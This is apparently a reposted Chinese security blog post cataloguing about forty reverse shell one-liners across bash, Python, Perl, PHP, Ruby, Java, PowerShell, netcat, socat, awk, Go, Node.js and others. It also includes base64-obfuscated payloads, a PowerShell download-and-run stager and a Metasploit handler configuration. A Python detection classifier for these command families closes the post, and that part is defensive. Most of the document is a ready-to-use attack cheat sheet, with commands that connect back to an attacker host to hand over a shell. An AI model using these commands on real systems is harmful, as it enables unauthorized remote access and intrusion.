杨CC有话说

Source: the WeChat public account 泷羽Sec

42 Common Reverse Shell Techniques

Preface

  • This post mainly covers the commonly used reverse shell commands.
  • Once you have obtained command execution, you usually need a reverse shell to get a stable shell and to get around restrictions imposed by firewalls and similar security controls.
  • Another advantage of a reverse shell is that you can upgrade it to an interactive shell with /bin/bash, python3 -c 'import pty;pty.spawn("/bin/bash")' or similar commands, which lets you run commands such as su to switch users or commands that add users; these prompt you for input, and that interactive input is something a plain non-interactive shell cannot do.
  • With that, let's look at the available reverse shell methods.
  • Note: ATTACKER_IP is the address you want the shell to connect back to, and PORT is the port it connects to.

Bash/terminal-based reverse shells

# 2.1 Classic TCP reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1

# 2.2 Using a file descriptor
exec 5<>/dev/tcp/ATTACKER_IP/PORT; cat <&5 | while read line; do $line 2>&5 >&5; done

# 2.3 Using a named pipe
mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | nc ATTACKER_IP PORT > /tmp/f

# 2.4 UDP reverse shell (less often detected)
bash -i >& /dev/udp/ATTACKER_IP/PORT 0>&1

# 2.5 Reverse shells to multiple ports
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 & bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1

# 2.6 bash -c wrapper (bypass variant)
bash -c '/bin/bash -i >& /dev/tcp/10.10.10.130/1234 0>&1'

Python reverse shell

# 3.1 Python 2
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# 3.2 Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];import pty; pty.spawn("/bin/bash")'

# 3.3 Python using the pty module
python -c 'import pty, socket, os;s=socket.socket(); s.connect(("ATTACKER_IP",PORT)); [os.dup2(s.fileno(),f) for f in (0,1,2)]; pty.spawn("/bin/sh")'

# 3.4 Python one-liner, base64-encoded (decodes to the 3.1 payload)
python -c "exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIkFUVEFDS0VSX0lQIixQT1JUKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ=='))"

Perl reverse shell

# 4.1 Classic Perl reverse shell
perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# 4.2 Perl short form
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ATTACKER_IP:PORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PHP reverse shell

# 5.1 PHP fsockopen
php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

# 5.2 PHP socket_create
php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_connect($s,"ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

# 5.3 PHP executing via system()
php -r 'system("bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1\"");'

Ruby reverse shell

# 6.1 Ruby TCPSocket (forked into the background)
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ATTACKER_IP","PORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

# 6.2 Ruby exec (foreground)
ruby -rsocket -e 'c=TCPSocket.new("ATTACKER_IP","PORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Java reverse shell

# 7.1 Java Runtime.exec
Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ATTACKER_IP/PORT;cat <&5 | while read line; do $line 2>&5 >&5; done"});

# 7.2 Complete Java class (compile and run)
public class ReverseShell {
    public static void main(String[] args) throws Exception {
        String[] cmd = {"/bin/bash", "-c", "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"};
        Runtime.getRuntime().exec(cmd);
    }
}

PowerShell reverse shell

# 8.1 PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

# 8.2 PowerShell base64-encoded command (downloads and runs reverse.ps1 from ATTACKER_IP:PORT)
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AQQBUAFQAQQBDAEsARQBSAF8ASQBQADoAUABPAFIAVAAvAHIAZQB2AGUAcgBzAGUALgBwAHMAMQAnACkA

Netcat reverse shell

# 9.1 Traditional nc
nc -e /bin/sh ATTACKER_IP PORT

# 9.2 When nc has no -e option
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f

# 9.3 nc over UDP
nc -u ATTACKER_IP PORT -e /bin/sh

# 9.4 ncat (the nmap version)
ncat ATTACKER_IP PORT -e /bin/bash

# 9.5 Catching the nc shell with msf (Metasploit handler configuration)
msfconsole
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.53.51
set LPORT 1234
run -j
use multi/recon/local_exploit_suggester
set session 3
run

Socat reverse shell

# 10.1 Socat over TCP
socat TCP:ATTACKER_IP:PORT EXEC:/bin/bash

# 10.2 Socat over UDP
socat UDP:ATTACKER_IP:PORT EXEC:/bin/bash

# 10.3 Socat with SSL encryption
socat OPENSSL:ATTACKER_IP:PORT EXEC:/bin/bash

Awk reverse shell

# 11.1 Awk TCP connection (gawk /inet special file)
awk 'BEGIN {s = "/inet/tcp/0/ATTACKER_IP/PORT"; while(1) { do { printf "shell>" |& s; s |& getline c; if(c) { while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'

Telnet reverse shell

# 12.1 Telnet with two ports (input on 4444, output on 4445)
telnet ATTACKER_IP 4444 | /bin/sh | telnet ATTACKER_IP 4445

Lua reverse shell

# 13.1 Lua socket
lua -e "require('socket');require('os');t=socket.tcp();t:connect('ATTACKER_IP','PORT');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Go reverse shell

# 14.1 Go one-liner
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","ATTACKER_IP:PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go

Node.js reverse shell

# 15.1 Node.js child process
require('child_process').exec('nc -e /bin/sh ATTACKER_IP PORT')

# 15.2 Node.js socket version
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(PORT, "ATTACKER_IP", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();

OpenSSL encrypted reverse shell

# 16.1 OpenSSL encrypted connection
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER_IP:PORT > /tmp/s; rm /tmp/s

# 16.2 OpenSSL with client certificate authentication
openssl s_client -connect ATTACKER_IP:PORT -quiet -cert client.pem -key client.key

Zsh reverse shell

# 17.1 Zsh built-in TCP module
zsh -c 'zmodload zsh/net/tcp && ztcp ATTACKER_IP PORT && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'

Expect reverse shell

# 18.1 Expect script (save as a .exp file and run it)
#!/usr/bin/expect
set host ATTACKER_IP
set port PORT
spawn /bin/bash
expect "$ "
send "bash -i >& /dev/tcp/$host/$port 0>&1\r"
interact

Variants based on /dev/tcp

# 19.1 Using exec redirection
0<&196;exec 196<>/dev/tcp/ATTACKER_IP/PORT; sh <&196 >&196 2>&196

# 19.2 Using read line
exec 5<>/dev/tcp/ATTACKER_IP/PORT; cat <&5 | while read line; do $line 2>&5 >&5; done

# 19.3 Using coproc (bash 4.0+)
coproc nc ATTACKER_IP PORT; cat <&"${COPROC[0]}" >&"${COPROC[1]}"
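As an added defensive example that is not part of the original post, the following Python classifier matches the indicator families catalogued above (the /dev/tcp and /dev/udp redirections, nc/ncat -e, the mkfifo-to-nc pipe, the socket/dup2 Python pattern, socat EXEC:, gawk /inet/tcp, zsh ztcp, and the PowerShell TCPClient/DownloadString forms) against process command lines, first decoding the base64 wrappers used in 3.4 and 8.2. The sample command lines, addresses and rule names are constructed for this example.

```python
import base64
import re

# Constructed sample process command lines (EDR / auditd execve style); addresses
# and ports are documentation values, not indicators from the page.
ENCODED = base64.b64encode(
    b'import socket,subprocess,os;s=socket.socket();s.connect(("203.0.113.5",4444));'
    b'os.dup2(s.fileno(),0);subprocess.call(["/bin/sh","-i"])').decode()
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    "nc -e /bin/sh 203.0.113.5 4444",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.5 4444 >/tmp/f",
    "socat TCP:203.0.113.5:4444 EXEC:/bin/bash",
    f"python -c \"exec(__import__('base64').b64decode('{ENCODED}'))\"",
    "grep -r TODO /srv/app",
]

# One regex per family of variants listed on this page (rule names are hypothetical).
RULES = [
    ("bash_dev_tcp_udp", re.compile(r"/dev/(tcp|udp)/\S+/\d+")),
    ("netcat_exec", re.compile(r"\b(nc|ncat|netcat)\b[^|;]*\s-e\s+\S*sh\b")),
    ("fifo_pipe_to_nc", re.compile(r"mkfifo\s+\S+.*\|\s*(nc|ncat|netcat)\b")),
    ("python_dup2_shell", re.compile(r"socket.*dup2.*(pty\.spawn|subprocess\.call)")),
    ("socat_exec", re.compile(r"\bsocat\b.*\b(TCP|UDP|OPENSSL):\S+.*\bEXEC:")),
    ("awk_inet_tcp", re.compile(r"/inet/tcp/\d+/")),
    ("zsh_ztcp", re.compile(r"\bztcp\b")),
    ("powershell_tcpclient_or_stager", re.compile(r"Net\.Sockets\.TCPClient|DownloadString\(")),
]

# The base64 wrappers (3.4 Python b64decode, 8.2 PowerShell -enc) hide every
# indicator from a plain substring match, so decode the blob before matching.
B64_ARG = re.compile(
    r"b64decode\('([A-Za-z0-9+/=]+)'\)|-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def unwrap(cmdline):
    """Return the command line followed by its decoded base64 payload, if any."""
    m = B64_ARG.search(cmdline)
    if not m:
        return cmdline
    raw = base64.b64decode(m.group(1) or m.group(2))
    # PowerShell -enc carries UTF-16LE; the Python variant carries plain UTF-8.
    text = raw.decode("utf-16-le" if m.group(2) else "utf-8", "replace")
    return cmdline + " " + text

def classify(cmdline):
    """Names of every rule that fires on the unwrapped command line; [] if none."""
    text = unwrap(cmdline)
    return [name for name, rx in RULES if rx.search(text)]
```

Command-line matching only sees what the listed variants put on the command line; a dropped script such as the Expect file in 18.1 or the Go source in 14.1 needs file or network telemetry instead.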
